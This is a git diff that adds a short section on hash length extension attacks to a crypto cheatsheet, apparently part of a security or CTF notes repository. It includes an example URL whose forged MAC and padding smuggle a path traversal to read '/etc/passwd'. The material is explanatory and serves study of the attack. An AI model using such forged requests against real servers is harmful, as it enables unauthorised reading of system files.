diff --git a/cheatsheets/crypto.md b/cheatsheets/crypto.md
index 2955875..f0a18ba 100644
--- a/cheatsheets/crypto.md
+++ b/cheatsheets/crypto.md
@@ -47,3 +47,23 @@
 ```
 0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345
 ```
+
+**Length extension attack**
+
+In cryptography and computer security, a length extension attack is a type of attack where an attacker can use `Hash(message1)` and the length of message1 to calculate `Hash(message1 ∥ message2)` for an attacker-controlled message2.
+
+```
+http://example.com/download?file=report.pdf&mac=563162c9c71a17367d44c165b84b85ab59d036f9
+```
+
+```
+http://example.com/download?file=report.pdf%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
+
+%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
+
+%00%00%A8/../../../../../../../etc/passwd&mac=ee40aa8ec0cfafb7e2ec4de20943b673968857a5
+```
+
+https://www.whitehatsec.com/blog/hash-length-extension-attacks/
+
+https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks